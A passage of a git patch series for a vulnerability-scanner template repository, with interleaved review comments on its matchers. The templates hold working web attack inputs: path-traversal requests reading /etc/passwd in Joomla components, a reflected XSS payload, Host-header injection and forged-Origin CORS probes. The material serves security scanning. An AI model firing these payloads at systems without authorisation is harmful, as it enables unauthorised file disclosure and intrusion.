'{{BaseURL}}bitrix/redirect.php?event1=%D0%A1%D0%BF%D0%B5%D1%86%D0%B8%D0%B0%D0%BB%D1%8C%D0%BD%D1%8B%D0%B5+%D0%B4%D0%BE%D0%BA%D0%BB%D0%B0%D0%B4%D1%8B&event2=&event3=download&goto=https://example.com' + - '{{BaseURL}}/bitrix/redirect.php?event1=%D0%A1%D0%BF%D0%B5%D1%86%D0%B8%D0%B0%D0%BB%D1%8C%D0%BD%D1%8B%D0%B5+%D0%B4%D0%BE%D0%BA%D0%BB%D0%B0%D0%B4%D1%8B&event2=&event3=download&goto=https://example.com' - '{{BaseURL}}/bitrix/redirect.php?event1=%D0%A1%D0%BF%D0%B5%D1%86%D0%B8%D0%B0%D0%BB%D1%8C%D0%BD%D1%8B%D0%B5+%D0%B4%D0%BE%D0%BA%D0%BB%D0%B0%D0%B4%D1%8B&event2=&event3=download&goto=https://example.com' matchers-condition: and From 0276758096b2e5b874eb58601450221b1f611bb3 Mon Sep 17 00:00:00 2001 
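Review bot: With the missing slash restored, the changed path in bitrix-open-redirect.yaml (PATCH 29/52) is character-for-character identical to the `redirect.php` entry on the following line, so the template now sends the same request twice per target. Deleting the line rather than correcting it gives the same coverage with one request fewer. The path list starts above the hunk, so other duplicates cannot be ruled out from here.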
From: sandeep Date: Wed, 25 Aug 2021 01:37:17 +0530 Subject: [PATCH 30/52] minor update --- cves/2019/CVE-2019-15501.yaml | 2 +- cves/2019/CVE-2019-8937.yaml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/cves/2019/CVE-2019-15501.yaml b/cves/2019/CVE-2019-15501.yaml index 8101dd4fbe..3481874161 100644 --- a/cves/2019/CVE-2019-15501.yaml +++ b/cves/2019/CVE-2019-15501.yaml @@ -2,7 +2,7 @@ id: CVE-2019-15501 info: name: LSoft ListServ - XSS - author: Borna Nematzadeh + author: LogicalHunter severity: medium reference: - https://www.exploit-db.com/exploits/47302 diff --git a/cves/2019/CVE-2019-8937.yaml b/cves/2019/CVE-2019-8937.yaml index 167c0a4d65..ee5c4a1fff 100644 --- a/cves/2019/CVE-2019-8937.yaml +++ b/cves/2019/CVE-2019-8937.yaml @@ -2,7 +2,7 @@ id: CVE-2019-8937 info: name: HotelDruid 2.3.0 - XSS - author: Borna Nematzadeh + author: LogicalHunter severity: medium refrense: https://www.exploit-db.com/exploits/46429 tags: cve,cve2019,xss,hoteldruid From 4cea960b71291da12cfc74791754fcfb6b9be2bb Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Wed, 25 Aug 2021 14:58:51 +0700 Subject: [PATCH 31/52] Create CVE-2010-1954.yaml --- cves/2010/CVE-2010-1954.yaml | 27 +++++++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 cves/2010/CVE-2010-1954.yaml diff --git a/cves/2010/CVE-2010-1954.yaml b/cves/2010/CVE-2010-1954.yaml new file mode 100644 index 0000000000..15235070e6 --- /dev/null +++ b/cves/2010/CVE-2010-1954.yaml 
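Review bot: In CVE-2019-8937.yaml (PATCH 30/52) the line directly below the changed `author` still spells the key `refrense:`, so the exploit-db link would not be read as the template's `reference`. Since this commit already touches the `info` block, the key can be corrected in the same change: `reference: https://www.exploit-db.com/exploits/46429`.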
@@ -0,0 +1,27 @@ +id: CVE-2010-1954 + +info: + name: Joomla! Component iNetLanka Multiple root 1.0 - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in the iNetLanka Multiple root (com_multiroot) component 1.0 and 1.1 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/12287 + - https://www.cvedetails.com/cve/CVE-2010-1954 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_multiroot&controller=../../../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 From 3528b01bbb85a276e47d1a03f7ad34a23057a6c2 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Wed, 25 Aug 2021 15:05:31 +0700 Subject: [PATCH 32/52] Create CVE-2010-1306.yaml --- cves/2010/CVE-2010-1306.yaml | 27 +++++++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 cves/2010/CVE-2010-1306.yaml diff --git a/cves/2010/CVE-2010-1306.yaml b/cves/2010/CVE-2010-1306.yaml new file mode 100644 index 0000000000..7a3b6a6390 --- /dev/null +++ b/cves/2010/CVE-2010-1306.yaml 
@@ -0,0 +1,27 @@ +id: CVE-2010-1306 + +info: + name: Joomla! Component Picasa 2.0 - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in the Picasa (com_joomlapicasa2) component 2.0 and 2.0.5 for Joomla! allows remote attackers to read arbitrary local files via a .. (dot dot) in the controller parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/12058 + - https://www.cvedetails.com/cve/CVE-2010-1306 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_joomlapicasa2&controller=../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 From 6c328909764b19f8f406163f49f3dec1eec112f8 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Wed, 25 Aug 2021 16:17:51 +0530 Subject: [PATCH 33/52] Update honeywell-web-controller.yaml --- exposed-panels/honeywell-web-controller.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/exposed-panels/honeywell-web-controller.yaml b/exposed-panels/honeywell-web-controller.yaml index 21a061ba40..332d7dc804 100644 --- a/exposed-panels/honeywell-web-controller.yaml +++ b/exposed-panels/honeywell-web-controller.yaml @@ -17,6 +17,7 @@ requests: - type: word words: - 'Honeywell XL Web Controller' + - type: status status: - 200 From cd81c9548e3c9014f36276b7272f062608199a54 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Wed, 25 Aug 2021 16:19:49 +0530 Subject: [PATCH 34/52] Update ibm-note-login.yaml --- exposed-panels/ibm-note-login.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/exposed-panels/ibm-note-login.yaml b/exposed-panels/ibm-note-login.yaml index b91e156e27..a178a6d3b7 100644 --- a/exposed-panels/ibm-note-login.yaml +++ b/exposed-panels/ibm-note-login.yaml @@ -10,6 +10,7 @@ info: requests: - method: GET path: + - '{{BaseURL}}' - '{{BaseURL}}/names.nsf' matchers-condition: and 
From bd7953e01742738e9f71c82ff26d1d3acb78da91 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Wed, 25 Aug 2021 16:48:11 +0530 Subject: [PATCH 35/52] Update lacie-panel.yaml --- exposed-panels/lacie-panel.yaml | 9 +++++++++ 1 file changed, 9 insertions(+) diff --git a/exposed-panels/lacie-panel.yaml b/exposed-panels/lacie-panel.yaml index f98eb897cc..09e63a143b 100644 --- a/exposed-panels/lacie-panel.yaml +++ b/exposed-panels/lacie-panel.yaml @@ -10,6 +10,7 @@ info: requests: - method: GET path: + - '{{BaseURL}}' - '{{BaseURL}}/dashboard/' matchers-condition: and @@ -17,6 +18,14 @@ requests: - type: word words: - 'id_LaCie' + part: body + + - type: regex + regex: + - '(?m)([a-zA-Z0-9&#; ]|)+Dashboard<\/title>$' + part: body + + - type: status status: - 200 From 6d2269f92c0508eaacb365598a5cdc3362696d82 Mon Sep 17 00:00:00 2001 From: Prince Chaddha <cyberbossprince@gmail.com> Date: Wed, 25 Aug 2021 16:51:24 +0530 Subject: [PATCH 36/52] Update synology-web-station.yaml --- technologies/synology-web-station.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/technologies/synology-web-station.yaml b/technologies/synology-web-station.yaml index 0493eb631b..4f741bbd77 100644 --- a/technologies/synology-web-station.yaml +++ b/technologies/synology-web-station.yaml @@ -17,6 +17,7 @@ requests: - type: word words: - '<title>Hello! Welcome to Synology Web Station!' + - type: status status: - 200 From 972ba7f4c28ce6ffad86a6c9779e4583b357800e Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Wed, 25 Aug 2021 16:55:53 +0530 Subject: [PATCH 37/52] Update CVE-2018-12095.yaml --- cves/2018/CVE-2018-12095.yaml | 13 +++++++------ 1 file changed, 7 insertions(+), 6 deletions(-) diff --git a/cves/2018/CVE-2018-12095.yaml b/cves/2018/CVE-2018-12095.yaml index 9cd62bafb4..eb04127534 100644 --- a/cves/2018/CVE-2018-12095.yaml +++ b/cves/2018/CVE-2018-12095.yaml 
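Review bot: The regex added to lacie-panel.yaml (PATCH 35/52), shown here as `(?m)([a-zA-Z0-9&#; ]|)+Dashboard<\/title>$`, ends in `$`, so it only matches when the closing title tag is the last thing on its line. A minified page that continues on the same line fails this matcher and, under `matchers-condition: and`, the whole template. The group `([a-zA-Z0-9&#; ]|)+` repeats an alternation with an empty branch and is equivalent to `[a-zA-Z0-9&#; ]*`. I would write the pattern as `'[a-zA-Z0-9&#; ]*Dashboard<\/title>'`, keeping any opening tag the original has (one may have been lost in this rendering).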
@@ -4,16 +4,17 @@ info: name: OEcms 3.1 - Cross-Site Scripting author: LogicalHunter severity: medium - reference: | - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12095 + description: A Reflected Cross-Site Scripting web vulnerability has been discovered in the OEcms v3.1 web-application. The vulnerability is located in the mod parameter of info.php. + reference: - https://www.exploit-db.com/exploits/44895 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12095 - https://cxsecurity.com/issue/WLB-2018060092 - tags: cve,cve2018,xss,OEcms + tags: cve,cve2018,xss requests: - method: GET path: - - '{{BaseURL}}/cms/info.php?mod=list' + - '{{BaseURL}}/cms/info.php?mod=list%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' matchers-condition: and matchers:
@@ -23,9 +24,9 @@ requests: part: body - type: word - words: - - "text/html" part: header + words: + - text/html - type: status status:
From 05305904ef3163656819e45e9216584423670759 Mon Sep 17 00:00:00 2001
From: sandeep
Date: Thu, 26 Aug 2021 02:43:53 +0530
Subject: [PATCH 38/52] more strict matchers
---
cves/2021/CVE-2021-38751.yaml | 15 +++++++++------
network/ftp-default-credentials.yaml | 8 +++++---
.../wordpress/wordpress-woocommerce-sqli.yaml | 2 ++
3 files changed, 16 insertions(+), 9 deletions(-)
diff --git a/cves/2021/CVE-2021-38751.yaml b/cves/2021/CVE-2021-38751.yaml
index 8d5172063c..4d8857e9fa 100644
--- a/cves/2021/CVE-2021-38751.yaml
+++ b/cves/2021/CVE-2021-38751.yaml
@@ -17,18 +17,21 @@ info: requests: - method: GET path: - - "{{BaseURL}}/" - - "{{BaseURL}}/login/showlogin" + - "{{BaseURL}}" + headers: Host: "{{randstr}}.tld" matchers-condition: and matchers: - - type: regex - regex: - - (EXPONENT\.(?:(?:J(?:QUERY|S)_UR|URL_FUL)|YUI2_UR)L=")?https?://{{randstr}}\.tld + - type: word + words: + - '{{randstr}}.tld' + - 'EXPONENT.PATH' + - 'EXPONENT.URL' part: body + condition: and - type: status status: - - 200 + - 200 \ No newline at end of file
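Review bot: In the CVE-2021-38751.yaml hunk the new word matcher checks `{{randstr}}.tld`, `EXPONENT.PATH` and `EXPONENT.URL` independently, so nothing ties the injected Host value to the EXPONENT URL variables any more. A page that echoes the Host header somewhere else in the body while defining those constants normally would satisfy all three words and be reported. If the intent is to show that the supplied host reaches the generated URLs, a regex matcher that requires the random host inside the assignment is the stricter check, e.g. `- 'EXPONENT\.[A-Z0-9_]+="https?://{{randstr}}\.tld'`, which follows the shape of the removed pattern. The hunk also leaves the file without a trailing newline.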
diff --git a/network/ftp-default-credentials.yaml b/network/ftp-default-credentials.yaml
index f8ef8e5479..d49482dad6 100644
--- a/network/ftp-default-credentials.yaml
+++ b/network/ftp-default-credentials.yaml
@@ -1,9 +1,9 @@ id: ftp-default-credentials info: - name: FTP Service with default credentials + name: FTP Service with anonymous Login author: pussycat0x - severity: low + severity: info tags: network,ftp,default-login network:
@@ -17,4 +17,6 @@ network: matchers: - type: word words: - "230" \ No newline at end of file + - "230" + - "Anonymous user logged in" + condition: and \ No newline at end of file
diff --git a/vulnerabilities/wordpress/wordpress-woocommerce-sqli.yaml b/vulnerabilities/wordpress/wordpress-woocommerce-sqli.yaml
index 6b2f2e9a82..ac2b1073b6 100644
--- a/vulnerabilities/wordpress/wordpress-woocommerce-sqli.yaml
+++ b/vulnerabilities/wordpress/wordpress-woocommerce-sqli.yaml
@@ -21,6 +21,8 @@ requests: words: - 'sqli-test' - 'attribute_counts' + - 'price_range' + - 'term' condition: and - type: word
From 22d0b35775d54d51c6cf8f4c85cc1c7e2311a2b6 Mon Sep 17 00:00:00 2001
From: Douglas Santos
Date: Wed, 25 Aug 2021 21:55:22 +0000
Subject: [PATCH 39/52] GLPI detection, status and telemetry exposure
---
.../glpi-status-ldap-domain-disclosure.yaml | 31 +++++++++++++++++++
.../files/glpi-telemetry-disclosure.yaml | 23 ++++++++++++++
technologies/glpi-cms-detect.yaml | 25 +++++++++++++++
3 files changed, 79 insertions(+)
create mode 100644 exposures/files/glpi-status-ldap-domain-disclosure.yaml
create mode 100644 exposures/files/glpi-telemetry-disclosure.yaml
create mode 100644 technologies/glpi-cms-detect.yaml
diff --git a/exposures/files/glpi-status-ldap-domain-disclosure.yaml b/exposures/files/glpi-status-ldap-domain-disclosure.yaml
new file mode 100644
index 0000000000..8260b0c0d3
--- /dev/null
+++ b/exposures/files/glpi-status-ldap-domain-disclosure.yaml
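Review bot: The second ftp-default-credentials.yaml hunk now requires the literal text `Anonymous user logged in` next to `230`, and that wording is server-specific rather than part of the FTP reply code, so servers that accept an anonymous login with a different message would be missed. The word `230` is also matched anywhere in the response instead of as the reply code at the start of a line. A regex matcher on the code itself, e.g. `- '(?m)^230[ -]'`, would address both, subject to how the engine presents multi-line replies. The first hunk renames the check to anonymous login and lowers severity to info while the `id` and the `default-login` tag on its context lines still describe default credentials, which is worth aligning. The inputs that perform the login lie outside both hunks.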
@@ -0,0 +1,31 @@
+id: glpi-status-domain-disclosure
+
+info:
+ name: GLPI Status Domain Disclosure
+ author: dogasantos
+ severity: info
+ tags: glpi,exposure
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/status.php"
+ - "{{BaseURL}}/glpi/status.php"
+ - "{{BaseURL}}/glpi2/status.php"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "GLPI_DB_OK"
+ - "Check LDAP servers"
+ - type: status
+ status:
+ - 200
+
+ extractors:
+ - type: regex
+ part: body
+ group: 1
+ regex:
+ - '((\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})|([a-zA-Z0-9]+(\.[a-zA-Z0-9]{2,3}){1,2}))'
diff --git a/exposures/files/glpi-telemetry-disclosure.yaml b/exposures/files/glpi-telemetry-disclosure.yaml
new file mode 100644
index 0000000000..034530b18b
--- /dev/null
+++ b/exposures/files/glpi-telemetry-disclosure.yaml
@@ -0,0 +1,23 @@
+id: glpi-telemetry-disclosure
+
+info:
+ name: GLPI Telemetry Disclosure
+ author: dogasantos
+ severity: info
+ tags: glpi,exposure
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/ajax/telemetry.php"
+ - "{{BaseURL}}/glpi/ajax/telemetry.php"
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "uuid"
+ - "glpi"
+ condition: and
+ - type: status
+ status:
+ - 200
diff --git a/technologies/glpi-cms-detect.yaml b/technologies/glpi-cms-detect.yaml
new file mode 100644
index 0000000000..fbd9fddfe4
--- /dev/null
+++ b/technologies/glpi-cms-detect.yaml
@@ -0,0 +1,25 @@
+id: glpi-cms-detect
+
+info:
+ name: GLPI Cms Detection
+ author: dogasantos
+ severity: info
+ tags: glpi,cms,php
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/"
+ - "{{BaseURL}}/glpi/"
+ - "{{BaseURL}}/glpi2/"
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "CFG_GLPI"
+ - "_glpi_csrf_token"
+ - "GLPI Copyright"
+ condition: and
+ - type: status
+ status:
+ - 200
From 064ee029220c32dc5b5a140c3e7e13243d4fb933 Mon Sep 17 00:00:00 2001
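Review bot: The extractor regex in the new glpi-status-ldap-domain-disclosure.yaml is broad enough to capture almost any dotted token: its second alternative `[a-zA-Z0-9]+(\.[a-zA-Z0-9]{2,3}){1,2}` matches file names and version-like strings such as `status.php` as readily as a domain, and the IPv4 alternative accepts octets above 255. Because the extracted value is what the finding presents as the disclosed host, anchoring the pattern to the status line that names the LDAP server would keep unrelated tokens out of results; the exact line format is not visible in the hunk, so this needs checking against a real response. The template id `glpi-status-domain-disclosure` also differs from the file name, which makes the finding harder to trace back to its template.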
From: Sandeep Singh
Date: Thu, 26 Aug 2021 03:39:38 +0530
Subject: [PATCH 40/52] Update glpi-cms-detect.yaml
---
technologies/glpi-cms-detect.yaml | 4 +++-
1 file changed, 3 insertions(+), 1 deletion(-)
diff --git a/technologies/glpi-cms-detect.yaml b/technologies/glpi-cms-detect.yaml
index fbd9fddfe4..422e350661 100644
--- a/technologies/glpi-cms-detect.yaml
+++ b/technologies/glpi-cms-detect.yaml
@@ -9,9 +9,10 @@ info: requests: - method: GET path: - - "{{BaseURL}}/" + - "{{BaseURL}}" - "{{BaseURL}}/glpi/" - "{{BaseURL}}/glpi2/" + matchers-condition: and matchers: - type: word
@@ -20,6 +21,7 @@ requests: - "_glpi_csrf_token" - "GLPI Copyright" condition: and + - type: status status: - 200
From ce1daa8c80b041101076bdaf593e6334c776eec2 Mon Sep 17 00:00:00 2001
From: Sandeep Singh
Date: Thu, 26 Aug 2021 03:42:53 +0530
Subject: [PATCH 41/52] Update glpi-status-ldap-domain-disclosure.yaml
---
exposures/files/glpi-status-ldap-domain-disclosure.yaml | 6 ++++--
1 file changed, 4 insertions(+), 2 deletions(-)
diff --git a/exposures/files/glpi-status-ldap-domain-disclosure.yaml b/exposures/files/glpi-status-ldap-domain-disclosure.yaml
index 8260b0c0d3..9704214ef3 100644
--- a/exposures/files/glpi-status-ldap-domain-disclosure.yaml
+++ b/exposures/files/glpi-status-ldap-domain-disclosure.yaml
@@ -17,8 +17,10 @@ requests: matchers: - type: word words: - - "GLPI_DB_OK" - - "Check LDAP servers" + - "GLPI_" + - "LDAP servers" + condition: and + - type: status status: - 200
From 0d3d9a37d9680813d23d2cd2358c2f106d2dddb9 Mon Sep 17 00:00:00 2001
From: sandeep
Date: Thu, 26 Aug 2021 03:47:32 +0530
Subject: [PATCH 42/52] misc update
---
exposures/files/glpi-status-ldap-domain-disclosure.yaml | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/exposures/files/glpi-status-ldap-domain-disclosure.yaml b/exposures/files/glpi-status-ldap-domain-disclosure.yaml
index 9704214ef3..9c912eac72 100644
--- a/exposures/files/glpi-status-ldap-domain-disclosure.yaml
+++ b/exposures/files/glpi-status-ldap-domain-disclosure.yaml
@@ -18,7 +18,7 @@ requests: - type: word words: - "GLPI_" - - "LDAP servers" + - "LDAP server" condition: and - type: status
From ee49f89109eae79a814b41c2231cc9f2cc063bb3 Mon Sep 17 00:00:00 2001
From: sandeep
Date: Thu, 26 Aug 2021 03:51:35 +0530
Subject: [PATCH 43/52] misc update
---
exposures/files/glpi-telemetry-disclosure.yaml | 6 ++++--
1 file changed, 4 insertions(+), 2 deletions(-)
diff --git a/exposures/files/glpi-telemetry-disclosure.yaml b/exposures/files/glpi-telemetry-disclosure.yaml
index 034530b18b..12428ecaf3 100644
--- a/exposures/files/glpi-telemetry-disclosure.yaml
+++ b/exposures/files/glpi-telemetry-disclosure.yaml
@@ -11,13 +11,15 @@ requests: path: - "{{BaseURL}}/ajax/telemetry.php" - "{{BaseURL}}/glpi/ajax/telemetry.php" + matchers-condition: and matchers: - type: word words: - - "uuid" - - "glpi" + - '"uuid":' + - '"glpi":' condition: and + - type: status status: - 200
From 1999a9b560fbf4331e04da6d9da4b288de5aa0ac Mon Sep 17 00:00:00 2001
From: sandeep
Date: Thu, 26 Aug 2021 04:24:06 +0530
Subject: [PATCH 44/52] Enhanced CORS checks
---
vulnerabilities/generic/basic-cors.yaml | 29 ---------
vulnerabilities/generic/cors-misconfig.yaml | 66 +++++++++++++++++++++
2 files changed, 66 insertions(+), 29 deletions(-)
delete mode 100644 vulnerabilities/generic/basic-cors.yaml
create mode 100644 vulnerabilities/generic/cors-misconfig.yaml
diff --git a/vulnerabilities/generic/basic-cors.yaml b/vulnerabilities/generic/basic-cors.yaml
deleted file mode 100644
index 0861b5ff8b..0000000000
--- a/vulnerabilities/generic/basic-cors.yaml
+++ /dev/null
@@ -1,29 +0,0 @@ -id: basic-cors-misconfig - -info: - name: Basic CORS misconfiguration - author: nadino,G4L1T0,convisoappsec - severity: info - reference: https://portswigger.net/web-security/cors - tags: cors,generic - -requests: - - method: GET - path: - - "{{BaseURL}}" - headers: - Origin: https://evil.com - - matchers-condition: or - matchers: - - type: word - words: - - "Access-Control-Allow-Origin: https://evil.com" - - "Access-Control-Allow-Credentials: true" - condition: and - part: header - - - type: word - part: header - words: - - "Access-Control-Allow-Origin: *"
diff --git a/vulnerabilities/generic/cors-misconfig.yaml b/vulnerabilities/generic/cors-misconfig.yaml
new file mode 100644
index 0000000000..8e814fade3
--- /dev/null
+++ b/vulnerabilities/generic/cors-misconfig.yaml
@@ -0,0 +1,66 @@
+id: cors-misconfig
+
+info:
+ name: Basic CORS misconfiguration
+ author: nadino,G4L1T0,convisoappsec,pdteam
+ severity: info
+ reference: https://portswigger.net/web-security/cors
+ tags: cors,generic
+
+requests:
+ - raw:
+ - |
+ GET / HTTP/1.1
+ Host: {{Hostname}}
+
+ - |
+ GET / HTTP/1.1
+ Host: {{Hostname}}
+ Origin: {{randstr}}.com
+
+ - |
+ GET / HTTP/1.1
+ Host: {{Hostname}}
+ Origin: null
+
+# - |
+# GET / HTTP/1.1
+# Host: {{Hostname}}
+# Origin: {{randstr}}.{{Hostname}}
+#
+# - |
+# GET / HTTP/1.1
+# Host: {{Hostname}}
+# Origin: {{Hostname}}{{randstr}}
+
+# TO DO for future as currently {{Hostname}} is not supported in matchers
+
+ matchers-condition: or
+ matchers:
+ - type: dsl
+ name: arbitrary-origin
+ dsl:
+ - "contains(tolower(all_headers), 'access-control-allow-origin: {{randstr}}.com')"
+ - "contains(tolower(all_headers), 'access-control-allow-credentials: true')"
+ condition: and
+
+ - type: dsl
+ name: null-origin
+ dsl:
+ - "contains(tolower(all_headers), 'access-control-allow-origin: null')"
+ - "contains(tolower(all_headers), 'access-control-allow-credentials: true')"
+ condition: and
+
+ - type: dsl
+ name: wildcard-acac
+ dsl:
+ - "contains(tolower(all_headers), 'access-control-allow-origin: *')"
+ - "contains(tolower(all_headers), 'access-control-allow-credentials: true')"
+ condition: and
+
+ - type: dsl
+ name: wildcard-no-acac
+ dsl:
+ - "contains(tolower(all_headers), 'access-control-allow-origin: *')"
+ - "!contains(tolower(all_headers), 'access-control-allow-credentials: true')"
+ condition: and
From d3d67ea9b7ee62b4fbd2d757dfe36ee2543635ac Mon Sep 17 00:00:00 2001
From: GitHub Action
Date: Wed, 25 Aug 2021 23:10:45 +0000
Subject: [PATCH 45/52] Auto Generated Templates Stats [Wed Aug 25 23:10:45 UTC 2021] :robot:
---
TEMPLATES-STATS.json | 2 +-
TEMPLATES-STATS.md | 1416 +++++++++++++++++++++---------------------
TOP-10.md | 18 +-
3 files changed, 720 insertions(+), 716 deletions(-)
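Review bot: The `arbitrary-origin` matcher in the new cors-misconfig.yaml lower-cases the response with `tolower(all_headers)` but compares it with `{{randstr}}` as generated, so if the random string can contain upper-case characters, a server that reflects the origin verbatim would never match. The probe `Origin: {{randstr}}.com` also carries no scheme, which is not a value a browser sends, and a server that parses the header before reflecting it may answer differently than it would to a real cross-origin request. Sending `Origin: https://{{randstr}}.com` and lower-casing the expected value on the matcher side would make a negative result more trustworthy. A comment on `wildcard-no-acac` noting that a bare `*` without credentials is expected for public resources would also help triage, since under `matchers-condition: or` it fires on every such response, including the first request that sends no Origin.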
diff --git a/TEMPLATES-STATS.json b/TEMPLATES-STATS.json
index d448d2c607..2770ad553e 100644
--- a/TEMPLATES-STATS.json
+++ b/TEMPLATES-STATS.json
@@ -1 +1 @@ -{"tags":[{"name":"cve","count":624},{"name":"panel","count":222},{"name":"xss","count":221},{"name":"exposure","count":212},{"name":"lfi","count":203},{"name":"wordpress","count":203},{"name":"rce","count":189},{"name":"cve2020","count":157},{"name":"wp-plugin","count":136},{"name":"tech","count":103},{"name":"cve2021","count":103},{"name":"config","count":93},{"name":"cve2019","count":88},{"name":"cve2018","count":78},{"name":"takeover","count":74},{"name":"","count":65},{"name":"apache","count":64},{"name":"token","count":64},{"name":"default-login","count":57},{"name":"iot","count":54},{"name":"cve2017","count":48},{"name":"file","count":46},{"name":"oob","count":45},{"name":"unauth","count":42},{"name":"network","count":38},{"name":"joomla","count":36},{"name":"sqli","count":36},{"name":"ssrf","count":32},{"name":"cve2016","count":32},{"name":"workflow","count":30},{"name":"oracle","count":30},{"name":"logs","count":30},{"name":"cve2010","count":28},{"name":"atlassian","count":27},{"name":"misc","count":27},{"name":"jira","count":27},{"name":"redirect","count":25},{"name":"listing","count":25},{"name":"generic","count":22},{"name":"aem","count":19},{"name":"cisco","count":19},{"name":"disclosure","count":18},{"name":"cve2015","count":18},{"name":"sap","count":18},{"name":"router","count":17},{"name":"auth-bypass","count":16},{"name":"springboot","count":16},{"name":"cve2014","count":15},{"name":"cve2012","count":14},{"name":"debug","count":14},{"name":"misconfig","count":13},{"name":"android","count":13},{"name":"struts","count":13},{"name":"fuzz","count":13},{"name":"cve2011","count":13},{"name":"weblogic","count":12},{"name":"dns","count":12},{"name":"dlink","count":12},{"name":"adobe","count":12},{"name":"jenkins","count":12},{"name":"devops","count":11},{"name":"php","count":11},{"name":"cve2013","count":11},{"name":"zoho","count":11},{"name":"magento","count":9},{"name":"xxe","count":9},{"name":"ftp","count":9},{"name":"ruijie","count":8},{"nam
e":"login","count":8},{"name":"aws","count":8},{"name":"rails","count":8},{"name":"airflow","count":8},{"name":"cnvd","count":8},{"name":"scada","count":8},{"name":"gitlab","count":8},{"name":"cve2009","count":7},{"name":"backup","count":7},{"name":"nginx","count":7},{"name":"vmware","count":7},{"name":"cms","count":6},{"name":"google","count":6},{"name":"jetty","count":6},{"name":"api","count":6},{"name":"dell","count":6},{"name":"citrix","count":6},{"name":"files","count":6},{"name":"laravel","count":6},{"name":"netgear","count":6},{"name":"rconfig","count":6},{"name":"cve2008","count":6},{"name":"django","count":6},{"name":"solr","count":6},{"name":"coldfusion","count":6},{"name":"drupal","count":5},{"name":"phpmyadmin","count":5},{"name":"iis","count":5},{"name":"circarlife","count":5},{"name":"headless","count":5},{"name":"microsoft","count":5},{"name":"windows","count":5},{"name":"confluence","count":5},{"name":"docker","count":5},{"name":"lucee","count":5},{"name":"fileupload","count":5},{"name":"wp-theme","count":5},{"name":"ssti","count":5},{"name":"java","count":5},{"name":"ibm","count":5},{"name":"dedecms","count":5},{"name":"firmware","count":4},{"name":"webserver","count":4},{"name":"grafana","count":4},{"name":"thinkphp","count":4},{"name":"traversal","count":4},{"name":"jolokia","count":4},{"name":"crlf","count":4},{"name":"vpn","count":4},{"name":"deserialization","count":4},{"name":"hp","count":4},{"name":"moodle","count":4},{"name":"magmi","count":4},{"name":"asp","count":4},{"name":"tomcat","count":4},{"name":"solarwinds","count":4},{"name":"elastic","count":4},{"name":"zimbra","count":4},{"name":"thinkcmf","count":4},{"name":"artifactory","count":4},{"name":"hongdian","count":4},{"name":"samsung","count":4},{"name":"nodejs","count":4},{"name":"exchange","count":4},{"name":"buffalo","count":4},{"name":"itop","count":3},{"name":"mongodb","count":3},{"name":"nacos","count":3},{"name":"kevinlab","count":3},{"name":"log","count":3},{"name":"slack","co
unt":3},{"name":"bypass","count":3},{"name":"printer","count":3},{"name":"intrusive","count":3},{"name":"httpd","count":3},{"name":"oa","count":3},{"name":"nexus","count":3},{"name":"zhiyuan","count":3},{"name":"backups","count":3},{"name":"terramaster","count":3},{"name":"lfr","count":3},{"name":"resin","count":3},{"name":"targa","count":3},{"name":"ebs","count":3},{"name":"kafka","count":3},{"name":"microstrategy","count":3},{"name":"ofbiz","count":3},{"name":"opensis","count":3},{"name":"r-seenet","count":3},{"name":"ssh","count":3},{"name":"bitrix","count":3},{"name":"openssh","count":3},{"name":"springcloud","count":3},{"name":"fpd","count":3},{"name":"wso2","count":3},{"name":"amazon","count":3},{"name":"symfony","count":3},{"name":"kubernetes","count":3},{"name":"zabbix","count":3},{"name":"fanruan","count":3},{"name":"git","count":3},{"name":"tikiwiki","count":3},{"name":"nosqli","count":3},{"name":"vbulletin","count":3},{"name":"caucho","count":3},{"name":"sharepoint","count":2},{"name":"strapi","count":2},{"name":"chiyu","count":2},{"name":"kibana","count":2},{"name":"netis","count":2},{"name":"vrealize","count":2},{"name":"mida","count":2},{"name":"sonarqube","count":2},{"name":"mail","count":2},{"name":"idrac","count":2},{"name":"shellshock","count":2},{"name":"trixbox","count":2},{"name":"mcafee","count":2},{"name":"telerik","count":2},{"name":"jellyfin","count":2},{"name":"prometheus","count":2},{"name":"smb","count":2},{"name":"avantfax","count":2},{"name":"rockethchat","count":2},{"name":"bigip","count":2},{"name":"yapi","count":2},{"name":"oauth","count":2},{"name":"proxy","count":2},{"name":"jsf","count":2},{"name":"natshell","count":2},{"name":"firebase","count":2},{"name":"status","count":2},{"name":"plesk","count":2},{"name":"huawei","count":2},{"name"